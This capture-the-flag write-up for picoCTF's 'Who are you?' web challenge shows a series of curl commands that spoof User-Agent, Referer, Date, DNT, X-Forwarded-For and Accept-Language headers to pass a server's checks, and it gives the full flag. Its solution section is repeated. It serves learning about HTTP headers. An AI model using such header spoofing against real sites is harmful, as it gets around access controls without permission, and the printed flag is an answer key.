Who are you?

Problem

Let me in. Let me iiiiiiinnnnnnnnnnnnnnnnnnnn http://mercury.picoctf.net:38322/

Solution

Resources: HTTP RFC / MDN HTTP Headers / Language Code Table / Sweden IP Address Ranged
curl http://mercury.picoctf.net:38322/ | grep "<h3.*>.*<\/h3>" --> Only people who use the official PicoBrowser are allowed on this site!
curl --user-agent "picobrowser" http://mercury.picoctf.net:38322/ | grep "<h3.*>.*<\/h3>" --> I don't trust users visiting from another site.
curl --user-agent "picobrowser" --referer "http://mercury.picoctf.net:38322/" http://mercury.picoctf.net:38322/ | grep "<h3.*>.*<\/h3>" --> Sorry, this site only worked in 2018.
curl --user-agent "picobrowser" --referer "http://mercury.picoctf.net:38322/" -H "Date: Mon, 23 11 2018 23:23:23 GMT" http://mercury.picoctf.net:38322/ | grep "<h3.*>.*<\/h3>" --> I don't trust users who can be tracked.
curl --user-agent "picobrowser" --referer "http://mercury.picoctf.net:38322/" -H "Date: Mon, 23 11 2018 23:23:23 GMT" -H "DNT: 1" http://mercury.picoctf.net:38322/ | grep "<h3.*>.*<\/h3>" --> This website is only for people from Sweden.
curl --user-agent "picobrowser" --referer "http://mercury.picoctf.net:38322/" -H "Date: Mon, 23 11 2018 23:23:23 GMT" -H "DNT: 1" -H "X-Forwarded-For: 2.71.255.255" http://mercury.picoctf.net:38322/ | grep "<h3.*>.*<\/h3>" --> You're in Sweden but you don't speak Swedish?
curl --user-agent "picobrowser" --referer "http://mercury.picoctf.net:38322/" -H "Date: Mon, 23 11 2018 23:23:23 GMT" -H "DNT: 1" -H "X-Forwarded-For: 2.71.255.255" -H "Accept-Language: sv-SE" http://mercury.picoctf.net:38322/ | grep "<h3.*>.*<\/h3>" --> What can I say except, you are welcome
Final command: curl --user-agent "picobrowser" --referer "http://mercury.picoctf.net:38322/" -H "Date: Mon, 23 11 2018 23:23:23 GMT" -H "DNT: 1" -H "X-Forwarded-For: 2.71.255.255" -H "Accept-Language: sv-SE" http://mercury.picoctf.net:38322/ | grep "<b>.*</b>" --> picoCTF{http_h34d3rs_v3ry_c0Ol_much_w0w_b22d773c}

Flag

picoCTF{http_h34d3rs_v3ry_c0Ol_much_w0w_b22d773c}

PreviousWeb Gauntlet 3 NextX marks the spot

Last updated 2 years ago

Was this helpful?

Solution

Resources: HTTP RFC / MDN HTTP Headers / Language Code Table / Sweden IP Address Ranged

curl http://mercury.picoctf.net:38322/ | grep "<h3.*>.*<\/h3>" --> Only people who use the official PicoBrowser are allowed on this site!

curl --user-agent "picobrowser" http://mercury.picoctf.net:38322/ | grep "<h3.*>.*<\/h3>" --> I don't trust users visiting from another site.

curl --user-agent "picobrowser" --referer "http://mercury.picoctf.net:38322/" http://mercury.picoctf.net:38322/ | grep "<h3.*>.*<\/h3>" --> Sorry, this site only worked in 2018.

curl --user-agent "picobrowser" --referer "http://mercury.picoctf.net:38322/" -H "Date: Mon, 23 11 2018 23:23:23 GMT" http://mercury.picoctf.net:38322/ | grep "<h3.*>.*<\/h3>" --> I don't trust users who can be tracked.

curl --user-agent "picobrowser" --referer "http://mercury.picoctf.net:38322/" -H "Date: Mon, 23 11 2018 23:23:23 GMT" -H "DNT: 1" http://mercury.picoctf.net:38322/ | grep "<h3.*>.*<\/h3>" --> This website is only for people from Sweden.

curl --user-agent "picobrowser" --referer "http://mercury.picoctf.net:38322/" -H "Date: Mon, 23 11 2018 23:23:23 GMT" -H "DNT: 1" -H "X-Forwarded-For: 2.71.255.255" http://mercury.picoctf.net:38322/ | grep "<h3.*>.*<\/h3>" --> You're in Sweden but you don't speak Swedish?

curl --user-agent "picobrowser" --referer "http://mercury.picoctf.net:38322/" -H "Date: Mon, 23 11 2018 23:23:23 GMT" -H "DNT: 1" -H "X-Forwarded-For: 2.71.255.255" -H "Accept-Language: sv-SE" http://mercury.picoctf.net:38322/ | grep "<h3.*>.*<\/h3>" --> What can I say except, you are welcome

Final command: curl --user-agent "picobrowser" --referer "http://mercury.picoctf.net:38322/" -H "Date: Mon, 23 11 2018 23:23:23 GMT" -H "DNT: 1" -H "X-Forwarded-For: 2.71.255.255" -H "Accept-Language: sv-SE" http://mercury.picoctf.net:38322/ | grep "<b>.*</b>" --> picoCTF{http_h34d3rs_v3ry_c0Ol_much_w0w_b22d773c}

Flag

picoCTF{http_h34d3rs_v3ry_c0Ol_much_w0w_b22d773c}